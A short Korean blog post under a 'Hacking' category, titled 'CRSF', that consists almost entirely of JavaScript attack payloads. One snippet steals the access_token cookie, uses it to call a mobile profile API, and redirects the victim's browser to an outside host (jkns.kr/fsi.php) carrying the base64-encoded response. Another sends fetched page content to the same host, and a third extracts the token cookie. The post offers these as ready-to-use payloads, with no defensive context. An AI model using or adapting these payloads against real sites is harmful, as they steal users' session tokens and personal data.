웹/Hacking
CRSF
즉흥
2022. 3. 10. 10:58
728x90
반응형
1. fetch 이용하기
var auth = document.cookie.match('(^|;) ?access_token=([^;]*)(;|$)')[2]
fetch('/mobile-api/rest/api/v1/mobile/me/profile/',{
headers: {
Authorization: 'Bearer ' + auth
}
}).then(a=>a.text()).then(a=>{location='http://jkns.kr/fsi.php?a='+(btoa(encodeURIComponent(a)))})
2. XHR 이용하기
const xhr = new XMLHttpRequest();
xhr.open("GET", "http://jkns.kr/test.html");
xhr.onreadystatechange = function () {
const { target } = event;
if (target.readyState === XMLHttpRequest.DONE) {
console.log(target.responseText);
location="http://jkns.kr/fsi.php?a="+btoa(unescape(encodeURIComponent(target.responseText)));
}
};
xhr.send();
3. 특정 쿠키값 가져오기
document.cookie.match('(^|;) ?access_token=([^;]*)(;|$)')[2]
728x90
반응형